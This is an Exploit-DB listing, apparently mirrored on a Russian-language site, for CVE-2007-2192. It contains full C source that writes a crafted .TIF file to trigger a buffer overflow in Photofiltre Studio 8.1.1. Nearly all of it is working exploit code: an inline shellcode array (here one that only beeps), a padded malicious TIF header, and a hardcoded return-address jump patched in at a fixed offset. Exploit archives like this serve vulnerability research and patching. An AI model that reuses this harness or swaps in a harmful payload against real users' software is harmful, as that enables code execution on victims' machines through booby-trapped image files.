- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3772
- Проверка EDB
-
- Пройдено
- Автор
- MARSU
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- cve-2007-2192
- Дата публикации
- 2007-04-21
C:
/********************************************************************************
* *
* Photofiltre Studio v8.1.1 .TIF File Buffer Overflow *
* *
* *
* Photofiltre is vulnerable to an unspecified buffer overflow when processing a *
* crafted .TIF file. *
* This exploit just beeps (useless but incredibly noisy!!). *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu <[email protected]> *
********************************************************************************/
#include "stdio.h"
#include "stdlib.h"
// Beep Shellcode, made by xnull
// Woaw this is very ... Hum try it!
unsigned char beepsp2[] =
"\x55\x89\xE5\x83\xEC\x18\xC7\x45\xFC"
"\x77\x7A\x83\x7C" //Address \x77\x7A\x83\x7C = SP2
"\xC7\x44\x24\x04"
"\xD0\x03" //Length \xD0\x03 = 2000 (2 seconds)
"\x00\x00\xC7\x04\x24"
"\x01\x0E" //Frequency \x01\x0E = 3585
"\x00\x00\x8B\x45\xFC\xFF\xD0\xC9\xC3";
char tif_file_part1[] =
"\x49\x49\x2a\x00\x08\x00\x00\x00\x17\x00\xfe\x00\x04\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x01\x04\x00\x01\x00\x00\x00\xfd\x01"
"\x00\x00\x01\x01\x04\x00\x01\x00\x00\x00\xb6\x01\x00\x00\x02\x01"
"\x03\x00\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00\x83\x00"
"\x00\x00\x05\x00\x00\x00\x06\x01\x03\x00\x01\x00\x00\x00\x03\x00"
"\x00\x00\x0a\x01\xb6\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01"
"\x04\x00\x37\x00\x00\x00\x22\x01\x00\x00\x12\x01\x03\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x15\x01\x03\x00\x01\x00\x00\x00\x01\x00"
"\x00\x00\x16\x01\x03\x00\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01"
"\x04\x00\x37\x00\x00\x00\xfe\x01\x00\x00\x1a\x01\x05\x00\x01\x00"
"\x00\x00\xda\x02\x00\x00\x1b\x01\x05\x00\x01\x00\x00\x00\xe2\x02"
"\x00\x00\x1c\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x28\x01"
"\x03\x00\x01\x00\x00\x00\x02\x00\x00\x00\x29\x01\x03\x00\x02\x00"
"\x00\x00\x00\x00\x01\x00\x31\x01\x02\x44\x43\x42\x41\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47\x47"
"\x47\x47\x47\x47\x47\x47\x47\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48\x48"
"\x48\x48\x48\x48\x48\x48\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c"
"\x4c\x4c\x4c\x4c\x4c\x4c\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4d"
"\x4d\x4d\x4d\x4d\x4d\x4d\x4d\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e"
"\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4e\x4f\x4f\x4f\x4f\x4f"
"\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x92\x00\x92"
"\x00\x96\x00\x00\x00\x00\x00\xaf\x00\x12\x00\x00\x00\x92\x00\x49"
"\x00\x12\x00\x92\x00\xaf\x00\x92\x00\x49\x00\x49\x00\x49\x00\x58"
"\x00\xaf\x00\x12\x00\x58\x00\x00\x00\x80\x00\x00\x00\x57\x00\x12"
"\x00\x5a\x00\x12\x00\x00\x00\x00\x00\x28\x00\x12\x00\x00\x00\x46"
"\x00\xfd\x00\xd5\x00\x1b\x00\xff\x00\xef\x00\xa9\x00\xd9\x00\x00"
"\x00\x70\x00\x6c\x00\xfa\x00\x99\x00\xc5\x00\xf7\x00\xb4\x00\x48"
"\x00\xab\x00\xe9\x00\xde\x00\x1b\x00\xff\x00\xd7\x00\x64\x00\xa9"
"\x00\xd9\x00\x6e\x00\x68\x00\x70\x00\x92\x00\xcc\x00\xf2\x00\x99"
"\x00\x94\x00\xe9\x00\xad\x00\xb4\x00\x4b\x00\xc9\x00\x85\x00\xe9"
"\x00\xe5\x00\xb4\x00\x80\x00\x98\x00\x8c\x00\xe0\x00\xc4\x00\x33"
;
int main(int argc, char* argv[])
{
FILE* tiffile;
char evilbuff[5000];
int offset=0;
printf("[+] Photofiltre Studio v8.1.1 .TIF File Buffer Overflow\n");
printf("[+] Coded and discovered by Marsu <[email protected]>\n");
if (argc!=2) {
printf("[+] Usage: %s <file.ttf>\n",argv[0]);
return 0;
}
memcpy(evilbuff,tif_file_part1,sizeof(tif_file_part1)-1);
offset=0xd5;
memcpy(evilbuff+offset,"\x43\x43\xeb\x05\x8c\x08\xfc\x7f\x43",9); //pop pop ret in ??? + jump over EIP
memcpy(evilbuff+offset+9,beepsp2,sizeof(beepsp2)-1);
printf("[+] tif_file_part2 patched!\n");
if ((tiffile=fopen(argv[1],"wb"))==0) {
printf("[-] Unable to access file.\n");
return 0;
}
fwrite( evilbuff, 1, 1360, tiffile );
fclose(tiffile);
printf("[+] Done. Have fun!\n");
return 0;
}
// milw0rm.com [2007-04-21]
- Источник
- www.exploit-db.com